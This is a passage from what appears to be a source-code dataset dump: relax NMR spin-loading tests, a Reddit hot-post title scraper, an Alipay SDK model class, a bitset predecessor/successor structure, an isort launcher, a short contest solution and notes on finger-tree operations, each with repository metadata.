self.assertEqual(cdp.mol[0].res[0].spin[5].num, 83)
self.assertEqual(cdp.mol[0].res[0].spin[5].name, '1HB')
self.assertEqual(cdp.mol[0].res[0].spin[6].num, 84)
self.assertEqual(cdp.mol[0].res[0].spin[6].name, '2HB')
self.assertEqual(cdp.mol[0].res[0].spin[7].num, 85)
self.assertEqual(cdp.mol[0].res[0].spin[7].name, 'CG')
self.assertEqual(cdp.mol[0].res[0].spin[8].num, 86)
self.assertEqual(cdp.mol[0].res[0].spin[8].name, 'OD1')
self.assertEqual(cdp.mol[0].res[0].spin[9].num, 87)
self.assertEqual(cdp.mol[0].res[0].spin[9].name, 'OD2')
self.assertEqual(cdp.mol[0].res[0].spin[10].num, 88)
self.assertEqual(cdp.mol[0].res[0].spin[10].name, 'C')
self.assertEqual(cdp.mol[0].res[0].spin[11].num, 89)
self.assertEqual(cdp.mol[0].res[0].spin[11].name, 'O')
def test_load_protein_gly_N_Ca_spins_from_pdb(self):
"""Load the glycine backbone amide N and Ca spins from a loaded protein PDB file."""
# Read the PDB file.
self.interpreter.structure.read_pdb(file='Ap4Aase_res1-12.pdb', dir=status.install_path + sep+'test_suite'+sep+'shared_data'+sep+'structures', read_model=1)
# Generate the sequence of nitrogen spins (1 molecule, all GLY residues, and only N spins).
self.interpreter.structure.load_spins(spin_id=':GLY@N')
# Append to the sequence the alpha carbon spins (1 molecule, all GLY residues, and only Ca spins).
self.interpreter.structure.load_spins(spin_id=':GLY@CA')
# Test some of the sequence.
self.assertEqual(len(cdp.mol), 1)
self.assertEqual(cdp.mol[0].name, 'Ap4Aase_res1-12_mol1')
self.assertEqual(len(cdp.mol[0].res), 3)
# 1st residue.
self.assertEqual(cdp.mol[0].res[0].num, 1)
self.assertEqual(cdp.mol[0].res[0].name, 'GLY')
self.assertEqual(len(cdp.mol[0].res[0].spin), 2)
self.assertEqual(cdp.mol[0].res[0].spin[0].num, 1)
self.assertEqual(cdp.mol[0].res[0].spin[0].name, 'N')
self.assertEqual(cdp.mol[0].res[0].spin[1].num, 2)
self.assertEqual(cdp.mol[0].res[0].spin[1].name, 'CA')
# 2nd residue.
self.assertEqual(cdp.mol[0].res[1].num, 4)
self.assertEqual(cdp.mol[0].res[1].name, 'GLY')
self.assertEqual(len(cdp.mol[0].res[1].spin), 2)
self.assertEqual(cdp.mol[0].res[1].spin[0].num, 43)
self.assertEqual(cdp.mol[0].res[1].spin[0].name, 'N')
self.assertEqual(cdp.mol[0].res[1].spin[1].num, 45)
self.assertEqual(cdp.mol[0].res[1].spin[1].name, 'CA')
# 3rd residue.
self.assertEqual(cdp.mol[0].res[2].num, 12)
self.assertEqual(cdp.mol[0].res[2].name, 'GLY')
self.assertEqual(len(cdp.mol[0].res[2].spin), 2)
self.assertEqual(cdp.mol[0].res[2].spin[0].num, 144)
self.assertEqual(cdp.mol[0].res[2].spin[0].name, 'N')
self.assertEqual(cdp.mol[0].res[2].spin[1].num, 146)
self.assertEqual(cdp.mol[0].res[2].spin[1].name, 'CA')
def test_load_protein_gly_N_spins_from_pdb(self):
"""Load the glycine backbone amide N spins from a loaded protein PDB file."""
# Read the PDB file.
self.interpreter.structure.read_pdb(file='Ap4Aase_res1-12.pdb', dir=status.install_path + sep+'test_suite'+sep+'shared_data'+sep+'structures', read_model=1)
# Generate the sequence (1 molecule, all GLY residues, and only N spins).
self.interpreter.structure.load_spins(spin_id=':GLY@N')
# Test some of the sequence.
self.assertEqual(len(cdp.mol), 1)
self.assertEqual(cdp.mol[0].name, 'Ap4Aase_res1-12_mol1')
self.assertEqual(len(cdp.mol[0].res), 3)
# 1st residue.
self.assertEqual(cdp.mol[0].res[0].num, 1)
self.assertEqual(cdp.mol[0].res[0].name, 'GLY')
self.assertEqual(len(cdp.mol[0].res[0].spin), 1)
self.assertEqual(cdp.mol[0].res[0].spin[0].num, 1)
self.assertEqual(cdp.mol[0].res[0].spin[0].name, 'N')
# 2nd residue.
self.assertEqual(cdp.mol[0].res[1].num, 4)
self.assertEqual(cdp.mol[0].res[1].name, 'GLY')
self.assertEqual(len(cdp.mol[0].res[1].spin), 1)
self.assertEqual(cdp.mol[0].res[1].spin[0].num, 43)
self.assertEqual(cdp.mol[0].res[1].spin[0].name, 'N')
# 3rd residue.
self.assertEqual(cdp.mol[0].res[2].num, 12)
self.assertEqual(cdp.mol[0].res[2].name, 'GLY')
self.assertEqual(len(cdp.mol[0].res[2].spin), 1)
self.assertEqual(cdp.mol[0].res[2].spin[0].num, 144)
self.assertEqual(cdp.mol[0].res[2].spin[0].name, 'N')
def test_load_protein_N_spins_from_pdb(self):
"""Load the protein backbone amide N spins from a loaded PDB file."""
# Read the PDB file.
self.interpreter.structure.read_pdb(file='Ap4Aase_res1-12.pdb', dir=status.install_path + sep+'test_suite'+sep+'shared_data'+sep+'structures', read_model=1)
# Generate the sequence (1 molecule, all residues, and only N spins).
self.interpreter.structure.load_spins(spin_id='@N')
# Test some of the sequence.
self.assertEqual(len(cdp.mol), 1)
self.assertEqual(cdp.mol[0].name, 'Ap4Aase_res1-12_mol1')
self.assertEqual(len(cdp.mol[0].res), 12)
# 1st residue.
self.assertEqual(cdp.mol[0].res[0].num, 1)
self.assertEqual(cdp.mol[0].res[0].name, 'GLY')
self.assertEqual(len(cdp.mol[0].res[0].spin), 1)
self.assertEqual(cdp.mol[0].res[0].spin[0].num, 1)
self.assertEqual(cdp.mol[0].res[0].spin[0].name, 'N')
# 2nd residue.
self.assertEqual(cdp.mol[0].res[1].num, 2)
self.assertEqual(cdp.mol[0].res[1].name, 'PRO')
self.assertEqual(len(cdp.mol[0].res[1].spin), 1)
self.assertEqual(cdp.mol[0].res[1].spin[0].num, 10)
self.assertEqual(cdp.mol[0].res[1].spin[0].name, 'N')
# 3rd residue.
self.assertEqual(cdp.mol[0].res[2].num, 3)
self.assertEqual(cdp.mol[0].res[2].name, 'LEU')
self.assertEqual(len(cdp.mol[0].res[2].spin), 1)
self.assertEqual(cdp.mol[0].res[2].spin[0].num, 24)
self.assertEqual(cdp.mol[0].res[2].spin[0].name, 'N')
# 4th residue.
self.assertEqual(cdp.mol[0].res[3].num, 4)
self.assertEqual(cdp.mol[0].res[3].name, 'GLY')
self.assertEqual(len(cdp.mol[0].res[3].spin), 1)
self.assertEqual(cdp.mol[0].res[3].spin[0].num, 43)
self.assertEqual(cdp.mol[0].res[3].spin[0].name, 'N')
# 5th residue.
self.assertEqual(cdp.mol[0].res[4].num, 5)
self.assertEqual(cdp.mol[0].res[4].name, 'SER')
self.assertEqual(len(cdp.mol[0].res[4].spin), 1)
self.assertEqual(cdp.mol[0].res[4].spin[0].num, 50)
self.assertEqual(cdp.mol[0].res[4].spin[0].name, 'N')
# 6th residue.
self.assertEqual(cdp.mol[0].res[5].num, 6)
self.assertEqual(cdp.mol[0].res[5].name, 'MET')
self.assertEqual(len(cdp.mol[0].res[5].spin), 1)
self.assertEqual(cdp.mol[0].res[5].spin[0].num, 61)
self.assertEqual(cdp.mol[0].res[5].spin[0].name, 'N')
# 7th residue.
self.assertEqual(cdp.mol[0].res[6].num, 7)
self.assertEqual(cdp.mol[0].res[6].name, 'ASP')
self.assertEqual(len(cdp.mol[0].res[6].spin), 1)
self.assertEqual(cdp.mol[0].res[6].spin[0].num, 78)
self.assertEqual(cdp.mol[0].res[6].spin[0].name, 'N')
# 8th residue.
self.assertEqual(cdp.mol[0].res[7].num, 8)
self.assertEqual(cdp.mol[0].res[7].name, 'SER')
self.assertEqual(len(cdp.mol[0].res[7].spin), 1)
self.assertEqual(cdp.mol[0].res[7].spin[0].num, 90)
self.assertEqual(cdp.mol[0].res[7].spin[0].name, 'N')
# 9th residue.
self.assertEqual(cdp.mol[0].res[8].num, 9)
self.assertEqual(cdp.mol[0].res[8].name, 'PRO')
self.assertEqual(len(cdp.mol[0].res[8].spin), 1)
self.assertEqual(cdp.mol[0].res[8].spin[0].num, 101)
self.assertEqual(cdp.mol[0].res[8].spin[0].name, 'N')
# 10th residue.
self.assertEqual(cdp.mol[0].res[9].num, 10)
self.assertEqual(cdp.mol[0].res[9].name, 'PRO')
self.assertEqual(len(cdp.mol[0].res[9].spin), 1)
self.assertEqual(cdp.mol[0].res[9].spin[0].num, 115)
self.assertEqual(cdp.mol[0].res[9].spin[0].name, 'N')
# 11th residue.
self.assertEqual(cdp.mol[0].res[10].num, 11)
self.assertEqual(cdp.mol[0].res[10].name, 'GLU')
self.assertEqual(len(cdp.mol[0].res[10].spin), 1)
self.assertEqual(cdp.mol[0].res[10].spin[0].num, 129)
self.assertEqual(cdp.mol[0].res[10].spin[0].name, 'N')
# 12th residue.
self.assertEqual(cdp.mol[0].res[11].num, 12)
self.assertEqual(cdp.mol[0].res[11].name, 'GLY')
self.assertEqual(len(cdp.mol[0].res[11].spin), 1)
self.assertEqual(cdp.mol[0].res[11].spin[0].num, 144)
self.assertEqual(cdp.mol[0].res[11].spin[0].name, 'N')
def test_read(self):
"""The sequence.read() test."""
# Read the sequence.
self.interpreter.sequence.read(file='test_seq', dir=status.install_path + sep+'test_suite'+sep+'shared_data', res_num_col=1, res_name_col=2)
# Test some of the sequence.
self.assertEqual(len(cdp.mol), 1)
self.assertEqual(cdp.mol[0].name, None)
self.assertEqual(len(cdp.mol[0].res), 5)
# 1st residue.
self.assertEqual(cdp.mol[0].res[0].num, -2)
self.assertEqual(cdp.mol[0].res[0].name, 'Gly')
self.assertEqual(len(cdp.mol[0].res[0].spin), 1)
self.assertEqual(cdp.mol[0].res[0].spin[0].num, None)
self.assertEqual(cdp.mol[0].res[0].spin[0].name, None)
def test_sequence_copy(self):
"""Test the sequence.copy user function."""
# First create some spins.
self.interpreter.spin.create(spin_name='A', spin_num=1, res_num=1)
self.interpreter.spin.create(spin_name='A', spin_num=2, res_num=1)
self.interpreter.spin.create(spin_name='B', spin_num=3, res_num=1)
self.interpreter.spin.create(spin_name='B2', spin_num=4, res_num=1)
self.interpreter.spin.create(spin_name='A', spin_num=1, res_num=2)
self.interpreter.spin.create(spin_name='A', spin_num=2, res_num=2)
self.interpreter.spin.create(spin_name='B', spin_num=3, res_num=2)
self.interpreter.spin.create(spin_name='B2', spin_num=4, res_num=2)
# Create a new data pipe to copy to.
self.interpreter.pipe.create('seq copy test', 'mf')
# Copy the sequence.
self.interpreter.sequence.copy(pipe_from='mf')
# Alias the data pipes.
pipe1 = ds['mf']
pipe2 = ds['seq copy test']
# Check the residue count.
self.assertEqual(len(pipe1.mol[0].res), len(pipe2.mol[0].res))
# Check the spin counts.
for i in range(len(pipe1.mol[0].res)):
self.assertEqual(len(pipe1.mol[0].res[i].spin), len(pipe2.mol[0].res[i].spin))
| [
"bugman@b7916896-f9f9-0310-9fe5-b3996d8957d5"
] | bugman@b7916896-f9f9-0310-9fe5-b3996d8957d5 |
986648f850c2baa86b81a830fe9aa86b1cb75ddc | ff60a647a3cc566220f5cefc8ddec7e1f865ac20 | /0x13-count_it/2-recurse.py | 01d85f2ffb597b45e64d288db5d85c4b052c9f42 | [] | no_license | mag389/holbertonschool-interview | cf6c2cc568bc321dcd705fbb76ad1e13ff8ba4f7 | 6f5b621d7a03efb990970e8c28ac41c1498aa6cd | refs/heads/main | 2023-07-19T05:57:50.296276 | 2021-09-09T14:34:02 | 2021-09-09T14:34:02 | 319,713,419 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,447 | py | #!/usr/bin/python3
""" script to scrape and count words from reddit hot posts
"""
import requests
import time
import urllib
import sys
def recurse(subreddit, hot_list=None, after=""):
    """Recursively collect the titles of all hot posts of a subreddit.

    Args:
        subreddit: name of the subreddit to query.
        hot_list: accumulator of titles; created on the first call.
            (A mutable default list would leak titles between independent
            top-level calls, so None is used as the sentinel instead.)
        after: pagination token returned by the previous API page.

    Returns:
        The list of hot-post titles, or None for an invalid subreddit
        (any non-200 response from the API).
    """
    if hot_list is None:
        hot_list = []
    custom_user = {"User-Agent": "custom"}
    url = "https://www.reddit.com/r/" + subreddit + "/hot.json"
    # allow_redirects=False so an invalid subreddit (redirect to search)
    # surfaces as a non-200 status instead of being followed.
    res = requests.get(url,
                       headers=custom_user,
                       params={'after': after},
                       allow_redirects=False)
    if res.status_code != 200:
        return None
    info = res.json()
    children = info.get('data').get('children')
    if children is None or len(children) == 0:
        return hot_list
    for child in children:
        hot_list.append(child.get('data').get("title"))
    # 'after' is the cursor for the next page; None/'null' means last page.
    after = info.get('data').get('after')
    if after == 'null' or after is None:
        return hot_list
    return recurse(subreddit, hot_list, after)
| [
"mag389@cornell.edu"
] | mag389@cornell.edu |
2abce665437b0f3f3ab17d70c43c98a0c6ebc291 | 5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d | /alipay/aop/api/domain/AlipayInsSceneFamilydoctorItemBatchqueryModel.py | 4a78f51f516c09e2559b61451709e855a8a875f6 | [
"Apache-2.0"
] | permissive | alipay/alipay-sdk-python-all | 8bd20882852ffeb70a6e929038bf88ff1d1eff1c | 1fad300587c9e7e099747305ba9077d4cd7afde9 | refs/heads/master | 2023-08-27T21:35:01.778771 | 2023-08-23T07:12:26 | 2023-08-23T07:12:26 | 133,338,689 | 247 | 70 | Apache-2.0 | 2023-04-25T04:54:02 | 2018-05-14T09:40:54 | Python | UTF-8 | Python | false | false | 3,638 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class AlipayInsSceneFamilydoctorItemBatchqueryModel(object):
    """Request model for the family-doctor item batch-query API.

    All fields default to None; to_alipay_dict() only emits fields that are
    populated (truthy), matching the behaviour of the generated Alipay SDK
    models.
    """

    def __init__(self):
        self._ant_ser_contract_no = None
        self._disease_name_list = None
        self._emergency = None
        self._general_name_list = None

    @property
    def ant_ser_contract_no(self):
        return self._ant_ser_contract_no

    @ant_ser_contract_no.setter
    def ant_ser_contract_no(self, value):
        self._ant_ser_contract_no = value

    @property
    def disease_name_list(self):
        return self._disease_name_list

    @disease_name_list.setter
    def disease_name_list(self, value):
        # Only genuine lists are accepted; any other value leaves the field untouched.
        if isinstance(value, list):
            self._disease_name_list = [item for item in value]

    @property
    def emergency(self):
        return self._emergency

    @emergency.setter
    def emergency(self, value):
        self._emergency = value

    @property
    def general_name_list(self):
        return self._general_name_list

    @general_name_list.setter
    def general_name_list(self, value):
        if isinstance(value, list):
            self._general_name_list = [item for item in value]

    @staticmethod
    def _serialise(value):
        # Nested SDK objects know how to turn themselves into dicts;
        # plain values pass through unchanged.
        if hasattr(value, 'to_alipay_dict'):
            return value.to_alipay_dict()
        return value

    @staticmethod
    def _serialise_list_in_place(attr_value):
        # The generated SDK converts list elements in place before emitting them.
        if isinstance(attr_value, list):
            for idx, element in enumerate(attr_value):
                if hasattr(element, 'to_alipay_dict'):
                    attr_value[idx] = element.to_alipay_dict()

    def to_alipay_dict(self):
        """Serialise every populated (truthy) field into a plain dict."""
        params = dict()
        if self.ant_ser_contract_no:
            params['ant_ser_contract_no'] = self._serialise(self.ant_ser_contract_no)
        if self.disease_name_list:
            self._serialise_list_in_place(self.disease_name_list)
            params['disease_name_list'] = self._serialise(self.disease_name_list)
        if self.emergency:
            params['emergency'] = self._serialise(self.emergency)
        if self.general_name_list:
            self._serialise_list_in_place(self.general_name_list)
            params['general_name_list'] = self._serialise(self.general_name_list)
        return params

    @staticmethod
    def from_alipay_dict(d):
        """Rebuild a model from a wire dict; empty/None input yields None."""
        if not d:
            return None
        o = AlipayInsSceneFamilydoctorItemBatchqueryModel()
        for key in ('ant_ser_contract_no', 'disease_name_list', 'emergency', 'general_name_list'):
            if key in d:
                setattr(o, key, d[key])
        return o
| [
"jishupei.jsp@alibaba-inc.com"
] | jishupei.jsp@alibaba-inc.com |
de6378f101239d52c399e53d1291b84af868b941 | f305f84ea6f721c2391300f0a60e21d2ce14f2a5 | /22_专题/implicit_graph/RangeFinder/Finder-fastset.py | ce22f608c5a5bd551f47efa704b5fe7821690be3 | [] | no_license | 981377660LMT/algorithm-study | f2ada3e6959338ae1bc21934a84f7314a8ecff82 | 7e79e26bb8f641868561b186e34c1127ed63c9e0 | refs/heads/master | 2023-09-01T18:26:16.525579 | 2023-09-01T12:21:58 | 2023-09-01T12:21:58 | 385,861,235 | 225 | 24 | null | null | null | null | UTF-8 | Python | false | false | 3,937 | py | # 寻找前驱后继/区间删除
from typing import Optional
class Finder:
    """Find, via bitwise operations, the first position to the left/right of
    a given index that has not been visited (erased) yet, over [0, n).
    Initially no position has been visited.
    """
    #_seg is a radix-1024 tower of bitmask words (arbitrary-size Python ints):
    #_seg[0][w] keeps one presence bit per position for the w-th block of 1024
    #positions; for h > 0, bit b of _seg[h][w] records whether the word
    #_seg[h-1][(w << 10) | b] one level below is non-zero.  _lg = tower height.
    __slots__ = "_n", "_lg", "_seg"
    @staticmethod
    def _trailingZeros1024(x: int) -> int:
        #index of the lowest set bit of a 1024-bit word; 1024 if the word is empty
        if x == 0:
            return 1024
        return (x & -x).bit_length() - 1
    def __init__(self, n: int) -> None:
        self._n = n
        seg = []
        #build levels, each 1024x smaller, until a single word covers everything
        while True:
            seg.append([0] * ((n + 1023) >> 10))
            n = (n + 1023) >> 10
            if n <= 1:
                break
        self._seg = seg
        self._lg = len(seg)
        #start with every position present (unvisited)
        for i in range(self._n):
            self.insert(i)
    def insert(self, i: int) -> None:
        #set the bit for i on every level up to the root
        for h in range(self._lg):
            self._seg[h][i >> 10] |= 1 << (i & 1023)
            i >>= 10
    def erase(self, i: int) -> None:
        #clear the bit for i; stop propagating upward once a word stays non-empty
        for h in range(self._lg):
            self._seg[h][i >> 10] &= ~(1 << (i & 1023))
            if self._seg[h][i >> 10]:
                break
            i >>= 10
    def next(self, i: int) -> Optional[int]:
        """Return the first unvisited position >= i (i itself included).
        None if no such position exists.
        """
        if i < 0:
            i = 0
        if i >= self._n:
            return
        seg = self._seg
        #climb: find the lowest level whose current word has a set bit at/after i
        for h in range(self._lg):
            if i >> 10 == len(seg[h]):
                break
            d = seg[h][i >> 10] >> (i & 1023)
            if d == 0:
                #nothing at/after i in this word -- continue one level up, next word
                i = (i >> 10) + 1
                continue
            #descend: repeatedly take the lowest set bit back down to level 0
            i += self._trailingZeros1024(d)
            for g in range(h - 1, -1, -1):
                i <<= 10
                i += self._trailingZeros1024(seg[g][i >> 10])
            return i
        #loop exhausted: implicitly returns None
    def prev(self, i: int) -> Optional[int]:
        """Return the first unvisited position <= i (i itself included).
        None if no such position exists.
        """
        if i < 0:
            return
        if i >= self._n:
            i = self._n - 1
        seg = self._seg
        for h in range(self._lg):
            if i == -1:
                break
            #shift so bits above position i fall off; inspect the highest set bit
            d = seg[h][i >> 10] << (1023 - (i & 1023)) & ((1 << 1024) - 1)
            if d == 0:
                i = (i >> 10) - 1
                continue
            i += d.bit_length() - 1024
            #descend taking the highest set bit on each lower level
            for g in range(h - 1, -1, -1):
                i <<= 10
                i += (seg[g][i >> 10]).bit_length() - 1
            return i
    def islice(self, begin: int, end: int):
        """Yield the unvisited positions inside [begin, end) in increasing order."""
        x = begin - 1
        while True:
            x = self.next(x + 1)
            if x is None or x >= end:
                break
            yield x
    def __contains__(self, i: int) -> bool:
        #membership = presence bit on the bottom level
        return not not self._seg[0][i >> 10] & (1 << (i & 1023))
    def __iter__(self):
        yield from self.islice(0, self._n)
    def __repr__(self):
        return f"FastSet({list(self)})"
if __name__ == "__main__":
    ...
    # Randomised self-test: compare Finder.prev/next against a brute-force
    # boolean array oracle.  (predecessor/successor reference implementations)
    def pre(pos: int):
        return next((i for i in range(pos, -1, -1) if ok[i]), None)
    def nxt(pos: int):
        return next((i for i in range(pos, n) if ok[i]), None)
    def erase(left: int, right: int):
        for i in range(left, right):
            ok[i] = False
    from random import randint
    for _ in range(100):
        n = randint(1, 100)
        F = Finder(n)
        for i in range(n):
            F.insert(i)  #redundant: Finder.__init__ already inserts every position
        ok = [True] * n
        for _ in range(100):
            e = randint(0, n - 1)
            F.erase(e)
            erase(e, e + 1)
        # Every position must agree with the brute-force oracle.
        for i in range(n):
            assert F.prev(i) == pre(i), (i, F.prev(i), pre(i))
            assert F.next(i) == nxt(i), (i, F.next(i), nxt(i))
    print("Done!")
| [
"lmt2818088@gmail.com"
] | lmt2818088@gmail.com |
af395d8bcd9241eb4c44624c39fe7ebc590dfbfb | fc04d8c88c98e85b349ba7e2e83f777382f0b723 | /backend/env/bin/isort | b6a6064048de9614320dc7fb78844625762b07be | [] | no_license | Iamprakashkhatri/DjangoReact | b4a653a410195c9fe97a6ca80db579a37d9db8ba | 9196c5ccda4821e054c85dafcc9873dd49ca8121 | refs/heads/master | 2022-12-08T14:18:58.491257 | 2020-08-23T12:52:47 | 2020-08-23T12:52:47 | 289,685,220 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 256 | #!/home/prakash/Downloads/DjangoReact/backend/env/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from isort.main import main
if __name__ == '__main__':
    # Console-script shim: strip the setuptools "-script.py(w)"/".exe" wrapper
    # suffix from argv[0], then delegate to isort's CLI entry point.
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(main())
| [
"prakash"
] | prakash | |
1ef40b11592352d2630e7e1c9536c6dc9c1fa5ee | 2463da77ab902e3728a71fc0a09fb92f687e755d | /contentful_proxy/handlers/files.py | ac9a51f1a693722ac68d98e5b4cf05a01ac3cd13 | [
"MIT"
] | permissive | stanwood/gae-contentful-proxy | 5c2f0aa41819483aa8e428134cc94d4f26c90141 | 739a8b370eb714e27a9f2b50e3772701f52f81df | refs/heads/master | 2020-03-24T20:41:06.798623 | 2019-02-28T10:22:46 | 2019-02-28T10:22:46 | 142,991,557 | 2 | 0 | MIT | 2019-02-28T10:22:47 | 2018-07-31T09:19:16 | Python | UTF-8 | Python | false | false | 4,576 | py | # The MIT License (MIT)
#
# Copyright (c) 2018 stanwood GmbH
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import logging
import os
import webapp2
from google.appengine.api import memcache
from google.appengine.api import urlfetch
from google.appengine.ext import ndb
from contentful_proxy.models import files
from contentful_proxy.utils.handlers import storage
from contentful_proxy.utils.handlers import webapp2_base
class CacheHandler(webapp2_base.CustomBaseHandler, storage.CloudClient):
    """Handler which saves a file and returns the file from Google Cloud Storage or from memcache."""
    # NOTE: Python 2 / Google App Engine standard-environment code (webapp2,
    # memcache, urlfetch, ndb); the u'' literals are significant there.
    @webapp2.cached_property
    def memcache_key(self):
        # Cache key: the request path including the query string.
        return self.request.path_qs
    @webapp2.cached_property
    def folder(self):
        # Storage folder, named after the upstream host from the route.
        return self.request.route_kwargs['source_host']
    @webapp2.cached_property
    def contentful_url(self):
        # Base URL of the upstream host the file is proxied from.
        return 'https://{}'.format(self.request.route_kwargs['source_host'])
    @webapp2.cached_property
    def file_path(self):
        return self.request.route_kwargs.get('file_path')
    @webapp2.cached_property
    def file_path_with_parameters(self):
        # File path with the original query string re-attached, so the query
        # parameters are part of the cached file's identity.
        if self.request.query_string:
            file_path_with_parameters = u'{}?{}'.format(self.file_path, self.request.query_string)
        else:
            file_path_with_parameters = self.file_path
        return file_path_with_parameters
    @webapp2.cached_property
    def file_url(self):
        # Full upstream URL of the requested file.
        return '{}/{}'.format(self.contentful_url, self.file_path_with_parameters)
    def dispatch(self):
        """
        Dispatches the request.
        If the file url is stored in memcache, the dispatcher redirects to the memcached
        url; otherwise it runs the handler method and caches the resulting redirect url.
        """
        self.response.headers['Access-Control-Allow-Origin'] = '*'
        self.response.headers['Cache-Control'] = 'no-cache'
        # Fast path: the redirect target for this path+query is already known.
        redirect_url = memcache.get(self.memcache_key)
        if redirect_url:
            self.redirect(redirect_url, code=303)
        else:
            # Slow path: let get() resolve/store the file, then remember the
            # redirect target it produced.
            # NOTE(review): assumes every non-cached dispatch ends in a
            # redirect (i.e. a 'location' header is set) -- confirm that
            # error responses cannot reach the memcache.set below.
            super(CacheHandler, self).dispatch()
            memcache.set(
                self.memcache_key,
                self.response.headers['location']
            )
    def get(self, *args, **kwargs):
        """
        Returns file by its file path.
        When file is called first time, file is saved in Google Cloud Storage and its details are saved
        in Google Datastore (ndb).
        Otherwise, file details are taken from Google Datastore and File is returned from Google Cloud Storage.
        Usage:
            curl -X GET "https://{domain}.appspot.com/contentful/file_cache/{source_host}/{file_path}
        """
        _, file_name = os.path.split(self.file_path)
        # Datastore entity keyed by the full upstream URL records where the
        # cached copy lives in Cloud Storage.
        contentful_file = ndb.Key(files.ContentfulFile, self.file_url).get()
        if contentful_file is None:
            logging.debug("Image not cached")
            # First access: fetch from upstream and persist a public copy.
            response = urlfetch.fetch(self.file_url, deadline=60)
            blob = self.store(
                file_name=self.file_path_with_parameters + u'/' + file_name,
                file_data=response.content,
                content_type=response.headers.get('content-type', 'application/octet-stream')
            )
            blob.make_public()
            contentful_file = files.ContentfulFile(
                id=self.file_url,
                public_url=blob.public_url,
                name=blob.name,
                memcache_key=self.memcache_key
            )
            contentful_file.put()
        # Always serve the file via its public Cloud Storage URL (303).
        self.redirect(contentful_file.public_url.encode('utf-8'), code=303)
| [
"rivinek@gmail.com"
] | rivinek@gmail.com |
f35a141a6b9327cb830d2aa9efce7a27e0ecb22c | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02797/s548875738.py | 1e4c657afd00f60237371da34c8f737408e516b4 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 197 | py | N,K,S=map(int,input().split())
# Emit K copies of S, padded with N-K filler values: S+1 normally, or 1 when
# S is already at the 10**9 upper bound (so S+1 would be out of range).
filler = S + 1 if S < 10**9 else 1
ans = [S] * K
ans += [filler] * (N - K)
print(*ans)
print(*ans) | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
d1bf2049a59457c56b84b74c34d47389cacbb62b | 13f4a06cd439f579e34bf38406a9d5647fe7a0f3 | /script/finger_tree_ops.py | 4642df8feb8f57e7fb70984082e457c293f5e93e | [] | no_license | edt-yxz-zzd/python3_src | 43d6c2a8ef2a618f750b59e207a2806132076526 | 41f3a506feffb5f33d4559e5b69717d9bb6303c9 | refs/heads/master | 2023-05-12T01:46:28.198286 | 2023-05-01T13:46:32 | 2023-05-01T13:46:32 | 143,530,977 | 2 | 2 | null | null | null | null | UTF-8 | Python | false | false | 121,767 | py | #HHHHH
r'''
the -> cls The... ISingleton
assert the is T()
arg:iterator/seq/tree
reverse
L/R end
insert at?
replace
extend/join
times/mul
split at?
delete at?
cased_tuple/tuple/FrozenDict-record
per element monoid_ops
measure by index
grep '^def|^class|^\w+\s*=' __file__
grep '^[a-zA-Z_]' __file__
_debug.py forgots
buttom -> bottom
grep buttom -r . -l -i
./nn_ns/CJK/cjk_subsets/cjk_subsets__relationship.py
./nn_ns/CJK/cjk_subsets/cjk_subsets__relationship.py.out/cjk_rel_more.txt
./nn_ns/CJK/cjk_subsets/cjk_subsets__relationship.py.result.txt
./nn_ns/CJK/cjk_subsets/cjk_common_subset.py
./nn_ns/filedir/backup_tools/fsys_mapping_ex.py
./nn_ns/filedir/backup_tools/fsys_mapping_patch.py
./nn_ns/graph/biconnected_planar_d2d3.py
./nn_ns/math_nn/matrix_api.py
view ../../python3_src/seed/ops/IOps4OneMainObjType.py
py -m script.finger_tree_ops
e ../../python3_src/script/finger_tree_ops.py
<<--mv--<< e script/finger_tree_ops.py
e script/finger_tree_ops\[20210504].py
py script/finger_tree_ops.py
view others/数学/编程/tree/finger_tree.txt
finger_tree_ops
raw_finger_tree_ops
mk same name wrapper method:
^\(\s*def \)\(\w*\)\(.*\n.*\):_'$
%s//\1___\2___\3:\2'\r\1\2\3:___\2___'
@abstractmethod
def f(...):
'... #see:_'
==>>
@abstractmethod
def ___f___(...):
'... #see:f'
def f(...):
'... #see:___f___'
get abstractmethod decl
each abstractmethod decl occupy 3 lines
copy whole class body to file end
exec below vim q/ search-cmd && q: edit-cmd, to remove non-abstractmethod func
^\(\s*@abstractmethod.*\)\n\(.*\)\n\(.*\)
.,$s//##?!\1\r##?!\2\r##?!\3
^\(##?!\)\@!.*\n
.,$s//
^\(##?!\)
.,$s//
forward call 4 wrapper class
the undering obj/wrapped obj named '__ops'
each abstractmethod decl has form regex'^\s*def .*/):$''
each abstractmethod decl occupy 3 lines
copy all abstractmethod decls to file end
exec below vim q/ search-cmd && q: edit-cmd, to remove non-abstractmethod func
